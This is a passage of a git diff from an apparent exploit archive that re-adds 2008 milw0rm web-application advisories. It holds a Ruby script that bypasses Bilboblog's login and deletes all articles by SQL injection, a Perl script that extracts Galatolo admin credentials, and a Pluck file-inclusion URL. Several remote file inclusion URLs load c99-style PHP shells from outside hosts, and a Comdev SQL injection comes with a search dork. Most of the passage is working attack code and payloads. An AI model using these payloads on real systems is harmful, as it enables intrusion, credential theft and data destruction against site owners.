- '.$title; - 56| } - - 78| <?php if(!empty($titleId)) { echo $titleId; } else { echo $title; } ?> - 79| - - When a page is loaded, the script checks if a number is present in the url to see if she could print an article. - If the URL ( $_SERVER['QUERY_STRING'] ) contains a number (the id) the script load the article corresponding to the id - in $_SERVER['QUERY_STRING']. - - If $_SERVER['QUERY_STRING'] (the url) do not contain a number, the variable $titleId is not set and print : - we can define it on add a parameter titleId in the url and his value will be printed on the web page. - But, the variable $titleId is betwenn the balise, so we need to add before the malicious code. - We have : http://site.com/bilboblog/?titleId=TITLE - - Anyway, there are unfunny XSS in admin files and 'footer.php' : - - http://site.com/bilboblog/footer.php?t_lang[lang_copyright]=XSS - http://site.com/bilboblog/admin/?content=XSS - http://site.com/bilboblog/admin/homelink.php?url=">XSS - http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_help]=XSS - http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_clear_cache]=XSS - http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_home]=XSS - http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_logout]=XSS - - and also in /admin/post.php ... - - - - .: III. SQL Injection - ---------------------- - - In admin panel, we can delete articles by sending article's id we want to supress to the script delete.php - which clean the id of spaces and include it in a basic sql query : - - 25| # Check values - 26| if(isset($_POST['num']) && $_POST['num'] != "") { - 27| $article = trim($_POST['num']); - - 36| # Insert new content // It's look like a copy/paste :)) - 37| $sql = "DELETE FROM $db_table WHERE num_article = '$article';"; - 38| $result = mysql_query($sql); - - So, with magic_quotes off, we can inject sql code in the query and, by example, delete all entries - (all articles) in the database. 
- To delete all entries, we must send a post request to delete.php, for the poc see at the end of file. - - - - .: IV. Full Path Disclosure - ---------------------------- - - And to finish, the are to FPD which can be exploited for a server attack or in sql injection : - http://localhost/Audits/bilboblog/footer.php?enable_cache=false - http://localhost/Audits/bilboblog/pagination.php // don't need any conditions - - - - .: Õ. SQL INJECTION POC (Ruby) - --------------------------------------- - - # -- CUT - - # Config - host = 'site.com' - path = '/bilboblog/' - # -- End - - require 'net/http' - http = Net::HTTP.new(host) - - data = { 0 => "admin_login=1&admin_passwd=1", 1 => "num=-1' OR num_article > 0#" } - resp = http.post(path+'admin/login.php?login=1&password=1', data[0]) - - cookie = { 'Cookie' => resp.response['set-cookie'] } - resp = http.post(path+'admin/delete.php', data[1], cookie) - if(resp.code.to_s == '302') : puts 'Done !' end - - - # -- EOF - - - Black_H - blackh.eu - http://blackh.eu/Advisories/Billboblog_2.1_Advisories.txt - -# milw0rm.com [2008-07-14] + ------------------------------------------------------------------ + + Name : Bilboblog 2.1 Multiples Vulnerabilities + Description : Bilboblog is a small application of micro-blogging in Php / MySQL + Link : http://www.tux-planet.fr/bilboblog-version-021-english-translation/ + + Vuln. types : Login Bypass - Cross Site Scripting - SQL Injection - Full Path Disclosure + + Conditions : - SQL Injection : Magic Quotes Off + - Login Bypass, XSS : Register Globals On + + Credits : Black_H + + ------------------------------------------------------------------ + + + .: I. Login Bypass + ------------------- + + This vulnerability need register_global on. + The file "admin/index.php" (and most of the admin files) includes the file 'login.php' (at line 23) which contains : + + 22| session_start(); + 23| $checkLogin = false; + 24| #echo "toto".$_SESSION['admin_login']; // note: wtf ?? 
+ 25| if(!isset($_SESSION['admin_login'])) { + 26| + 27| # Check form values + 28| if (isset($_POST) && (!empty($_POST['admin_login'])) && (!empty($_POST['admin_passwd'])) ) { + 29| + 30| # Get Session vriables + 31| $admin_login = trim($_POST['admin_login']); + 32| $admin_passwd = trim($_POST['admin_passwd']); + 33| + 34| # Check login + 35| if($admin_login == $login && $admin_passwd == $password) { + 36| $checkLogin = true; + 37| $_SESSION['admin_login'] = $admin_login; + 38| $_SESSION['admin_passwd'] = $admin_passwd; + 39| } + 40| } + 41| + 42| } else { + 43| $checkLogin = true; + 44| } + 45| + 46| 22| if(!$checkLogin) { + 47| + 48| # Print login form + [...] + 58| exit(0); + 59| } + + So, we need the session 'admin_login' ( $_SESSION['admin_login'] ) to have admin rights in all files. The script checks + if we have post good login and pass or not. It's look like good, but if we call directly the login.php file, + the $login and $password variable are not defined. We can set them with register_globals on, valid the form with + the same value and so set $_SESSION['admin_login']. + + In facts, go on the page http://site.com/bilboblog/admin/login.php?login=1&password=1 and fill the forms with '1' value + and submit. Because checkLogin is true nothing is printed and you're admin :))) + + + + .: II. Cross Site Scripting + ---------------------------- + + 1) Permanent XSS + + When an admin ( legitim or not :)) ) post an article, the enCode function is applied to the content : + + ---- 'admin/update.php' + + 25| # Check values + 26| if(isset($_POST['content']) && $_POST['content'] != "") { + 27| $content = enCode(substr(trim($_POST['content']), 0, $limit_post)); + [...] + 36| # Insert new content + 37| $sql = "INSERT INTO $db_table VALUES ('', '".time()."', '$content');"; + 38| $result = mysql_query($sql); + + ---- 'admin/function.php' + + 141| function enCode($chaine) { + 142| + [...] 
// # Youtube & Dailymotion encode url + 145| + 146| # Detect string encoding + 147| $encodage = mb_detect_encoding($chaine); + 148| if($encodage == "ASCII") $encodage = "iso-8859-1"; # Htmlentities unknown ASCII + 149| + 150| # Convert special char to html code + 151| $chaine = htmlentities($chaine,ENT_QUOTES,$encodage); + 152| $chaine = addslashes($chaine); + 153| + 154| # Return result + 155| return $chaine; + 156| } + + The function clean all html chars in the content that we've submit. + It protects the user against XSS in all pages of the blog but in the 'widget.php' file stripslashes() + and html_entity_decode() functions is applied to the content which is printed ! + So je just need to get admin rights (see upper) post malicious code and share widget.php's url to the victim. + + 2) Unpermanents XSS + + The file "index.php" includes the file 'head.php' (at line 21) which contains : + + 44| if ($_SERVER['QUERY_STRING'] != "" && intval($_SERVER['QUERY_STRING']) != "") { + [...] + 55| $titleId = str2Url($liste[2], 100, 0).' - '.$title; + 56| } + + 78| <?php if(!empty($titleId)) { echo $titleId; } else { echo $title; } ?> + 79| + + When a page is loaded, the script checks if a number is present in the url to see if she could print an article. + If the URL ( $_SERVER['QUERY_STRING'] ) contains a number (the id) the script load the article corresponding to the id + in $_SERVER['QUERY_STRING']. + + If $_SERVER['QUERY_STRING'] (the url) do not contain a number, the variable $titleId is not set and print : + we can define it on add a parameter titleId in the url and his value will be printed on the web page. + But, the variable $titleId is betwenn the balise, so we need to add before the malicious code. 
+ We have : http://site.com/bilboblog/?titleId=TITLE + + Anyway, there are unfunny XSS in admin files and 'footer.php' : + + http://site.com/bilboblog/footer.php?t_lang[lang_copyright]=XSS + http://site.com/bilboblog/admin/?content=</textarea>XSS + http://site.com/bilboblog/admin/homelink.php?url=">XSS + http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_help]=XSS + http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_clear_cache]=XSS + http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_home]=XSS + http://site.com/bilboblog/admin/homelink.php?t_lang[lang_admin_logout]=XSS + + and also in /admin/post.php ... + + + + .: III. SQL Injection + ---------------------- + + In admin panel, we can delete articles by sending article's id we want to supress to the script delete.php + which clean the id of spaces and include it in a basic sql query : + + 25| # Check values + 26| if(isset($_POST['num']) && $_POST['num'] != "") { + 27| $article = trim($_POST['num']); + + 36| # Insert new content // It's look like a copy/paste :)) + 37| $sql = "DELETE FROM $db_table WHERE num_article = '$article';"; + 38| $result = mysql_query($sql); + + So, with magic_quotes off, we can inject sql code in the query and, by example, delete all entries + (all articles) in the database. + To delete all entries, we must send a post request to delete.php, for the poc see at the end of file. + + + + .: IV. Full Path Disclosure + ---------------------------- + + And to finish, the are to FPD which can be exploited for a server attack or in sql injection : + http://localhost/Audits/bilboblog/footer.php?enable_cache=false + http://localhost/Audits/bilboblog/pagination.php // don't need any conditions + + + + .: Õ. 
SQL INJECTION POC (Ruby) + --------------------------------------- + + # -- CUT + + # Config + host = 'site.com' + path = '/bilboblog/' + # -- End + + require 'net/http' + http = Net::HTTP.new(host) + + data = { 0 => "admin_login=1&admin_passwd=1", 1 => "num=-1' OR num_article > 0#" } + resp = http.post(path+'admin/login.php?login=1&password=1', data[0]) + + cookie = { 'Cookie' => resp.response['set-cookie'] } + resp = http.post(path+'admin/delete.php', data[1], cookie) + if(resp.code.to_s == '302') : puts 'Done !' end + + + # -- EOF + + + Black_H - blackh.eu + http://blackh.eu/Advisories/Billboblog_2.1_Advisories.txt + +# milw0rm.com [2008-07-14] diff --git a/platforms/php/webapps/6074.txt b/platforms/php/webapps/6074.txt index c7e410d01..abab691bf 100755 --- a/platforms/php/webapps/6074.txt +++ b/platforms/php/webapps/6074.txt 
@@ -1,70 +1,70 @@
-########################## www.BugReport.ir #########################
-#
-# AmnPardaz Security Research Team
-#
-# Title: Pluck Local File inclusion
-# Vendor: http://www.pluck-cms.org
-# Bug: Local File Inclusion
-# Vulnerable Version: 4.5.1 (prior versions also may be affected)
-# Exploitation: Remote with browser
-# Fix: N/A
-###################################################################
-
-
-####################
-- Description:
-####################
-
-Pluck is a content management system, written in php.
-
-
-####################
-- Vulnerability:
-####################
-
-+--> Local File Inclusion
-
-Input passed to multiple parameters in "predefined_variables.php" are not properly verified
-before being used to include files.
-This can be exploited to include arbitrary files from local resources.
-
-Code Snippet:
-/data/inc/themes/predefined_variables.php #line:15-38
-
-//Include Translation data
-include ("data/settings/langpref.php");
-include ("data/inc/lang/$langpref");
-//Get Site-title
-$sitetitle = file_get_contents("data/settings/title.dat");
-
-//Get the page-data
-$filetoread = $_GET['file'];
-$album = $_GET['album'];
-$blogpost = $_GET['blogpost'];
-$cat = $_GET['cat'];
-
-if (($filetoread) && (file_exists("data/content/$filetoread"))) {
-include "data/content/$filetoread"; }
-
-elseif ($album) {
-$title = $album; }
-
-elseif ($blogpost) {
-include("data/blog/$cat/posts/$blogpost"); }
-
-elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) {
-$title = $lang_front1;
-$content = $lang_front2; }
-
-
-POC: http://localhost/pluck-4_5_1/data/inc/themes/predefined_variables.php?blogpost=../../../../../../../../boot.ini
-
-####################
-- Credit :
-####################
-AmnPardaz Security Research Team
-Contact: admin[4t}bugreport{d0t]ir
-www.BugReport.ir
-www.AmnPardaz.comz
-
-# milw0rm.com [2008-07-14]
+########################## www.BugReport.ir #########################
+#
+# AmnPardaz Security Research Team
+#
+# Title: Pluck Local File inclusion
+# Vendor: http://www.pluck-cms.org
+# Bug: Local File Inclusion
+# Vulnerable Version: 4.5.1 (prior versions also may be affected)
+# Exploitation: Remote with browser
+# Fix: N/A
+###################################################################
+
+
+####################
+- Description:
+####################
+
+Pluck is a content management system, written in php.
+
+
+####################
+- Vulnerability:
+####################
+
++--> Local File Inclusion
+
+Input passed to multiple parameters in "predefined_variables.php" are not properly verified
+before being used to include files.
+This can be exploited to include arbitrary files from local resources.
+
+Code Snippet:
+/data/inc/themes/predefined_variables.php #line:15-38
+
+//Include Translation data
+include ("data/settings/langpref.php");
+include ("data/inc/lang/$langpref");
+//Get Site-title
+$sitetitle = file_get_contents("data/settings/title.dat");
+
+//Get the page-data
+$filetoread = $_GET['file'];
+$album = $_GET['album'];
+$blogpost = $_GET['blogpost'];
+$cat = $_GET['cat'];
+
+if (($filetoread) && (file_exists("data/content/$filetoread"))) {
+include "data/content/$filetoread"; }
+
+elseif ($album) {
+$title = $album; }
+
+elseif ($blogpost) {
+include("data/blog/$cat/posts/$blogpost"); }
+
+elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) {
+$title = $lang_front1;
+$content = $lang_front2; }
+
+
+POC: http://localhost/pluck-4_5_1/data/inc/themes/predefined_variables.php?blogpost=../../../../../../../../boot.ini
+
+####################
+- Credit :
+####################
+AmnPardaz Security Research Team
+Contact: admin[4t}bugreport{d0t]ir
+www.BugReport.ir
+www.AmnPardaz.comz
+
+# milw0rm.com [2008-07-14]
diff --git a/platforms/php/webapps/6075.txt b/platforms/php/webapps/6075.txt
index 511cab9e8..da6e3fcae 100755
--- a/platforms/php/webapps/6075.txt
+++ b/platforms/php/webapps/6075.txt
@@ -1,68 +1,68 @@
---==+============================================================================+==--
---==+ Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability +==--
---==+============================================================================+==--
-
- [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
- [+] Discovered On: 14 Jul 2008
- [+] Download: http://gwm.dev-area.org/view.php?id=8
-
- [*] Vulnerabilities:
-
- [*] XSS <= 1.3a
- [+] all.php?tag= [Code Javascript]
- [+] http://site.com/all.php?tag=
-
- [*] SQL (plugin users) 1.3a
- [+] plugins/users/index.php?id= [Code SQL]
- [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
-
- [*] Exploit:
-
- #!/usr/bin/perl
- use strict;
- use LWP::UserAgent;
-
- my $host = shift;
- my ($start,$content,@login);
- my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";
-
- if($host =~ /^http:\/\/?/i)
- {
- $start = new LWP::UserAgent or die "[+] Unable to connect\n";
- $start->timeout(1);
- $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
- $content = $start->get($host.$evilxx);
-
- if($content->is_success)
- {
- if($content->content =~ /%(.+?)%([0-9a-f]{32})/)
- {
- push(@login,$1,$2);
- print "[+] Login:\n";
- print "[+] Username: $login[0]\n";
- print "[+] Password: $login[1]\n\n";
-
- print "[+] Cookie Session:\n";
- print "[+] gwm_user = $login[0]\n";
- print "[+] gwm_pass = $login[1]\n\n";
-
- print "[+] Crack Password:\n";
- print "[+] md5(md5(password)) for crack:\n";
- print "[+] http://passcracking.com\n";
- }
- else
- {
- print "[+] Exploit Failed\n";
- print "[+] Site Not Vulnerable\n";
- }
- }
- }
- else
- {
- print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
- print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
- print "[+] Usage: Perl $0 \n";
- print "[+] Usage: Perl $0 http://site.com\n";
- }
-
-# milw0rm.com [2008-07-15]
+--==+============================================================================+==--
+--==+ Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability +==--
+--==+============================================================================+==--
+
+ [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
+ [+] Discovered On: 14 Jul 2008
+ [+] Download: http://gwm.dev-area.org/view.php?id=8
+
+ [*] Vulnerabilities:
+
+ [*] XSS <= 1.3a
+ [+] all.php?tag= [Code Javascript]
+ [+] http://site.com/all.php?tag=
+
+ [*] SQL (plugin users) 1.3a
+ [+] plugins/users/index.php?id= [Code SQL]
+ [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
+
+ [*] Exploit:
+
+ #!/usr/bin/perl
+ use strict;
+ use LWP::UserAgent;
+
+ my $host = shift;
+ my ($start,$content,@login);
+ my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";
+
+ if($host =~ /^http:\/\/?/i)
+ {
+ $start = new LWP::UserAgent or die "[+] Unable to connect\n";
+ $start->timeout(1);
+ $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
+ $content = $start->get($host.$evilxx);
+
+ if($content->is_success)
+ {
+ if($content->content =~ /%(.+?)%([0-9a-f]{32})/)
+ {
+ push(@login,$1,$2);
+ print "[+] Login:\n";
+ print "[+] Username: $login[0]\n";
+ print "[+] Password: $login[1]\n\n";
+
+ print "[+] Cookie Session:\n";
+ print "[+] gwm_user = $login[0]\n";
+ print "[+] gwm_pass = $login[1]\n\n";
+
+ print "[+] Crack Password:\n";
+ print "[+] md5(md5(password)) for crack:\n";
+ print "[+] http://passcracking.com\n";
+ }
+ else
+ {
+ print "[+] Exploit Failed\n";
+ print "[+] Site Not Vulnerable\n";
+ }
+ }
+ }
+ else
+ {
+ print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
+ print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
+ print "[+] Usage: Perl $0 \n";
+ print "[+] Usage: Perl $0 http://site.com\n";
+ }
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6076.txt b/platforms/php/webapps/6076.txt
index 7bdfa1893..293b81724 100755
--- a/platforms/php/webapps/6076.txt
+++ b/platforms/php/webapps/6076.txt
@@ -1,45 +1,45 @@
- ====================================================
- | pSys v0.7.0 Alpha Multiple Remote File Include
- | (works only with register_globals = on)
- | Founded By rXh RoMaNTiC-TeaM
- ====================================================
-
-[!] Discovered.: RoMaNcYxHaCkEr
-[!] Vendor.....: http://www.powie.de
-[!] My Homepage...: WwW.4RxH.CoM
-[!] RoMaNTiC-TeaM Members ...: Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
-[!] Contact Me ...: rxh0@hotmail.com
-
-[!] Background.: pSys is a module based PHP Script
-
-[!] Bugs........: In Different Files & In Different Variable And Lines
-
-[!] PoC........:
-
-http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
-
-[!] Solution...: Contact With Me I Will Declear All This Fucking Function
-
-[!] Greetingz..: No One Deserved (Am I Said The Truth ?!!!)
-
-[!] Thx .. : DNX For Your Exploit I Found This Bugs From Your Exploit :)
-
-[!] rXh
-
-[!] bEST wISHES
-
-# milw0rm.com [2008-07-15]
+ ====================================================
+ | pSys v0.7.0 Alpha Multiple Remote File Include
+ | (works only with register_globals = on)
+ | Founded By rXh RoMaNTiC-TeaM
+ ====================================================
+
+[!] Discovered.: RoMaNcYxHaCkEr
+[!] Vendor.....: http://www.powie.de
+[!] My Homepage...: WwW.4RxH.CoM
+[!] RoMaNTiC-TeaM Members ...: Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
+[!] Contact Me ...: rxh0@hotmail.com
+
+[!] Background.: pSys is a module based PHP Script
+
+[!] Bugs........: In Different Files & In Different Variable And Lines
+
+[!] PoC........:
+
+http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
+
+[!] Solution...: Contact With Me I Will Declear All This Fucking Function
+
+[!] Greetingz..: No One Deserved (Am I Said The Truth ?!!!)
+
+[!] Thx .. : DNX For Your Exploit I Found This Bugs From Your Exploit :)
+
+[!] rXh
+
+[!] bEST wISHES
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6078.txt b/platforms/php/webapps/6078.txt
index 6ed9af682..9ddd20426 100755
--- a/platforms/php/webapps/6078.txt
+++ b/platforms/php/webapps/6078.txt
@@ -1,38 +1,38 @@
- << In The Name Of GOD >>
-
-
- -------------------------------------------------------------
- - [ Persian Boys Hacking Team ] -:- 2008
- -
- - discovered by N3TR00T3R [at] Y! [dot] com
- - pragyan 2.6.2 Remote File Includion
- - download :http://sourceforge.net/project/showfiles.php?group_id=220286
- - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
- r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
- Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
- [www.Persian-Boys.com] & [www.irchatan.com]
- --------------------------------------------------------------
-
-if register_globals = On;
-
-
-Vul Code : [/cms/modules/form.lib.php]
-##########################################################
-#global $sourceFolder;
-#global $moduleFolder;
-#require_once("$sourceFolder/$moduleFolder/form/editform.php");
-#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
-#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
-#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
-#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
-##########################################################
-
-Exploit :
-
-##########################################################
-#
-# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
-#
-##########################################################
-
-# milw0rm.com [2008-07-15]
+ << In The Name Of GOD >>
+
+
+ -------------------------------------------------------------
+ - [ Persian Boys Hacking Team ] -:- 2008
+ -
+ - discovered by N3TR00T3R [at] Y! [dot] com
+ - pragyan 2.6.2 Remote File Includion
+ - download :http://sourceforge.net/project/showfiles.php?group_id=220286
+ - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
+ r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
+ Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
+ [www.Persian-Boys.com] & [www.irchatan.com]
+ --------------------------------------------------------------
+
+if register_globals = On;
+
+
+Vul Code : [/cms/modules/form.lib.php]
+##########################################################
+#global $sourceFolder;
+#global $moduleFolder;
+#require_once("$sourceFolder/$moduleFolder/form/editform.php");
+#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
+#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
+#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
+#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
+##########################################################
+
+Exploit :
+
+##########################################################
+#
+# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
+#
+##########################################################
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6079.txt b/platforms/php/webapps/6079.txt
index a3671b42d..e7e4e9d0b 100755
--- a/platforms/php/webapps/6079.txt
+++ b/platforms/php/webapps/6079.txt
@@ -1,102 +1,102 @@
-____________________ ___ ___ ________
-\_ _____/\_ ___ \ / | \\_____ \
- | __)_ / \ \// ~ \/ | \
- | \\ \___\ Y / | \
-/_______ / \______ /\___|_ /\_______ /
- \/ \/ \/ \/
-
- .OR.ID
-ECHO_ADV_100$2008
-
------------------------------------------------------------------------------------------
-[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
------------------------------------------------------------------------------------------
-
-Author : M.Hasran Addahroni
-Date : July, 14 th 2008
-Location : Jakarta, Indonesia
-Web : http://e-rdc.org/v1/news.php?readmore=102
-Critical Lvl : Medium
-Impact : System access
-Where : From Remote
---------------------------------------------------------------------------
-
-Affected software description:
-~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Application : Comdev Web Blogger
-version : <= 4.1.3
-Vendor : http://www.comdevweb.com/blogger.php
-Description :
-
-Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
-Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
-the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs,
-Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
-Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with
-CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
-sSet Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders •
-Installation Support available
-
---------------------------------------------------------------------------
-
-Vulnerability:
-~~~~~~~~~~~~~
-
-Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used
-in an sql query.
-This can be exploited thru the browser to manipulate SQL queries and pull the username and password
-from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.
-
-
-Poc/Exploit:
-~~~~~~~~~
-
-http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
-http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
-
-Admin Login at http://www.example.com/[PATH]/oneadmin/
-
-Dork:
-~~~~
-Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
-
-
-Solution:
-~~~~~~
-
-- Edit the source code to ensure that input is properly verified.
-- Turn on magic_quotes in php.ini
-
-
-Timeline:
-~~~~~~~~
-
-- 11 - 07 - 2008 bug found
-- 11 - 07 - 2008 vendor contacted
-- 14 - 07 - 2008 advisory released
---------------------------------------------------------------------------
-
-Shoutz:
-~~~~
-~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
-~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
-the_hydra,neng chika, str0ke
-~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
-~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
-super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
-~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
-kuntua, stev_manado,nofry,k1tk4t,0pt1c
-~ newbie_hacker@yahoogroups.com
-~ #aikmel #e-c-h-o @irc.dal.net
-
---------------------------------------------------------------------------
-Contact:
-~~~~~
-
-K-159 || echo|staff || eufrato[at]gmail[dot]com
-Homepage: http://www.e-rdc.org/
-
--------------------------------- [ EOF ] ----------------------------------
-
-# milw0rm.com [2008-07-15]
+____________________ ___ ___ ________
+\_ _____/\_ ___ \ / | \\_____ \
+ | __)_ / \ \// ~ \/ | \
+ | \\ \___\ Y / | \
+/_______ / \______ /\___|_ /\_______ /
+ \/ \/ \/ \/
+
+ .OR.ID
+ECHO_ADV_100$2008
+
+-----------------------------------------------------------------------------------------
+[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
+-----------------------------------------------------------------------------------------
+
+Author : M.Hasran Addahroni
+Date : July, 14 th 2008
+Location : Jakarta, Indonesia
+Web : http://e-rdc.org/v1/news.php?readmore=102
+Critical Lvl : Medium
+Impact : System access
+Where : From Remote
+---------------------------------------------------------------------------
+
+Affected software description:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Application : Comdev Web Blogger
+version : <= 4.1.3
+Vendor : http://www.comdevweb.com/blogger.php
+Description :
+
+Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
+Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
+the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs,
+Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
+Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with
+CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
